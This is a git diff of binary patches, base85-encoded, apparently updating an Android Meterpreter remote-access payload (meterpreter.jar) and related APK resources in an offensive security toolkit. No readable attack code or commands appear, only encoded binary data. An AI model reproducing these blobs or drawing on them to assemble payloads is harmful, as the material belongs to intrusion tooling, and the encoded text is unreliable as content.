zE0HoI+s$|~l|{wQWGtIymwif^0mGU|jq!AUyHKxb8X2dNrPs(GFeXQx0tWgCU86{J
zB9l6fyxHcnGg-@+jC2{(vf+NL2YaZZp946ONJYA0R;<@d=d58XW5g!8*}|;dIjbPA
zWHxU{f`jc!Sx#SFcHwN<tD0XlYreX8sclcj%)=4K2Mgw!+E#99rLwu!{G6N)WeeM<
z<3^fSheKb^N1A(a=g0^N&oO2)xwK`B6;ulrl-NCb#E9dDD;&^J&NO4A?1aLSaH5PL
z$G@^u+a~WScKubw<?38*!x9=XM2O>C*+j+|Phtd-eDqY>gEI{)(qmcay+i%j6ik$m
zGj?3bxx=aWQ3E4)7LH9Q%n>e~;-m{JJ56VecrJqtC^F27F@%jIh2U@opR*FlNZw}q
zayr6|WwXghPbzDfu}Nc}kx7gv?2U$dD=2|6XXgysp6-=0!^1o$d!xHX-msC)%E`{{
z9rf%<?}){%R0ccf+!FgYG`3v5Uz8SZXZF_acQ!9ORqmt;tJyj3AzP~Gm)y~z-j4oZ
zs*U0bf5t^BpA|uT9O~@Z-q|<2ci>R(uHNWQ&cLCukCc5lCid+FI4btx%)m!KY52gY
z!Jjx(_Ki^Oeq3vtHZ?TjZ|x`aO0_rQT94}!3P>}F5mH9b+X&jO9l`Z!r8$q31KTKg
zpx|b4Zr=HYw)_orl`(&>)Hx+*LoRM)tO&1CClrKGJZ9lGyUs3lB|`d)nJYW~+|0t2
zY9(=qiem9NVrEA&b~sD(5gYP+wQn{#WC}S4a03qDhWz1X7a$L8hd8Lo4b3pe&|W&7
z<e?!7NsDFBs>a6)isr0|=uFxm7f&Qh?)XG3(_v9CK4HX<b|w=z#O3geF~>G+WR4k`
zyv-xaWpk6{&udYf_vDT9`NA756-m|J_|OfGAA{;~m^WNG%p2rk-f)e;B|UC$7E<9m
zjI?+vV{kHK^cyA>$FT)j#xCQy>@A2LAcH}76wKH?W+V*@b;gY8!I(8czOh6$->!h0
zjOj!clh?+1ydM6P#oXg~pvq2=Ydo2QP{&hg(#KPoUF_R=hYhP^G@DB1EW31&4Olnc
zn|rg_oRP`WLbhEQiL*&i3CwaG9j_E2&7;qDB{DLz;1nXx>^0#bGj32Z61)M}k45C=
zq&%hNcnVJ`3Lx*Q-G%fC`w@#g6VA3rt_j}WNS(;VNhC-~AU^mhlH3XNSn8-jY7#zn
z<Kr;==1Ou!@+NUI+i@t>VSW@tW;&I@@+5PaBx#cvB<Yjc!&&U=P-g7%x*5$RVoCT~
z256CK9G{(=Zen?H>X9d9cFIMi5<L8w@S1a6kebTj4MRGX!3tRHU=Q@H!IiW$uWV7;
zevWIvQeR0NiDi(_L!Xz%nTN-RSo~--6N5w5w1wEs$RoqP$;r!S8b2S;kj^T%UX(Eq
z^;x4Q8XY8`lZbW>lA6K&rDk#_i7W-Pv13?#XR*)=f=<bff;bgt4IVeP`A*zoq-X6z
zfqYrR>PpE4r}@z5o=8*#<6wrLf~^?}ATeZ2<qSMQ+Uw4B=AI+u$|emX4Pmbg1Xji;
zMMrkVjH4Yk4cU`o2RoJ<64pdMO6~GlHjz6k9~Q`)&5b&$W=$jzIo4#FJXXr_orYqQ
zq#&A94g(z@vUPVZYwSp2!-32+j3LYy9g8JvuW_@wV9(*6gu4^tGvqpslO4-MdI`Q@
z<HILj7J5lrTN|wsoNmBJl`5uO!tHY1vu3L@y?BkP+%3YpT?!3yi6}n$Xep~@{4pc`
z1}!X6#U-H#q0%>mlGwkQ9uwMG@f~qOoI|cqT;9{F>${>(RLoP=Q!GnWai^&3Q@wWx
zWsOR=i{>^iwng=R4py4AZXQvUdqgM!sof{8YirwrVg$4qm2NBR)4WfJCF@Y*f~esZ
zlmtEmhOdf+F0b&q+(LKhH{;!VMlbm{m7c^fJuXrOl!h71lPX>07He1&g4HTkDI*>g
z`sxu?d|xbc=CwvFEZ$5f;HaHTRb@u`V^#Y$PeBaT_3aX6cxh5pCzb_N*PCMXT?y6w
zmRKn&7PO7DeN9!*it_0;<@jQkiUGOZZaUBYKBp>=iMn&D`Ylm+TGbvGt4^x|Md7UP
zh{dN|!lj^s=5mGLBCG<w`|2hA35_O~tV79@VuirV=ezn&tLpCxU8%SeHB_vbTO4r-
zd*KG0h5Iso<;O~t&f8j5G2pb;jrGw>j=tW8|80P!+%4WfvJVsbeX$m9e^!(vRP_g<
z={M7x?V->XC1;^zr!AVfR=09Syn=dE#HnKb@Zn<%DM9hJ2$d`Im7|*HNwLIES11c%
zt`y}}N-31`fXuIWQj}$8wTsFEE~AvsD=%@EDP=d6-CQ=P?JpY@WB9`VMSdMa75eQb
zw0H3KN(c|M6Xibbk#Z!2cpzMK;)M2GxnEo==j>vn&Q+9%S1a(Amy~i*A^%u<g(q+~
znyC<I;_i^}oDB)zrI7Hxw^(>CE)l+SRl@f`weUVsBfOVth3}(U;k}5rJ&IO|8V@Z)
z^etN~9$7BL6X3<=inxRq+JdT)``&UMsIQ_1`boU*5L6583^e{7i!Xi;!WYY5fHdIu
z8CwAVpD}*Vu@><E8{>B^{2N?5UcB%-n47>^==@%i-yib-Aye@q8K?RElL*`IU*3W4
zhK{20_dbC#{9cBC15{w=e)<2LsnFRjfB%B+fzH3DxuEly_%}X+&V9+>9MKMsoByxd
F{{xGG`!@gp

literal 17524
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
Bch3L-

diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc
index 0ef9aa31f6c93645717d0e187c8651e0a63b6f08..03f6c44d2873fe60ae877cb150946896a918e315 100644
GIT binary patch
delta 47
ycmX@Xa)gDIiGhc~Wg@FP(;vo-ej6BtO&B~F7#Ns<m=TCAfLLK-qw-`6CIJBDSO|0g

delta 47
ycmX@Ya)O1GiGhc~V<M|N69dymzYUDS77RWN3=B*_%m~CbK&&#cQGK!rlK=q5tOtz%

diff --git a/data/android/meterpreter.jar b/data/android/meterpreter.jar
index 1c87408103615072697651aebf3868d6b2f68b79..0bba1111b84526aff85729103dceb41f62166cbe 100644
GIT binary patch
delta 40455
zcmZ5`byQSc)Hg7|&<IMGg3{d`QqmIArP4@u%_USCL`tb41f-E}1_43oZf5B2p@#bA
zdB4BjcTKE&=gvKQpM8F@*SaUFA8Vl(i}<w$2>S^J9{PppbdyBP2@DAk{^oy#gSbQ7
zcOQHm=M?vL_8}+Kt|b4OtfI)=T-O6s8TOn99i8AZET+CF6JqlasGBqp`JEFhsZwzE
z@{coF+CNW)ZMLln$=RFYmWthhqU(2tceRCPHXkkCWzX@B%GA+($CdHQrI<U-sUT~y
zQ4#Y(F+ru%)wZdgK4ogdc&!1(L;0KEhht!1<e)$QJH<sOfOkm$m~%*%U(kqOxJFR0
zUQqNko;yDJoL_i_Q-g<dcyOdvWRm#8iwN)Hm~=&*?;jt}vF0zW;gP8UEgm&)-u}NM
z+$-wboPRYnG<h-qUHw+}X(t~b2a$7moj%rY`kxG<#)>Qa(9t3PHv^^G9?T?c5V~B+
z#<(1S&4g&?3mDeh$Mc_QvBH!%FtL9<#S9O{BqDqC<b8P5timrYEXwM)N4cRElVA#p
zAjO_=X6D={=$``s`_27BV!Gg*%QL|0Hdsc;Yj`mGyVUt|bLL<D%`1YSC;EYEf!c`M
zq3)t!fxAJW%&P1652^LdpSId4b42uYdB}zUiC^}i>+let7<K6%-9a4rr>sf@g5=D!
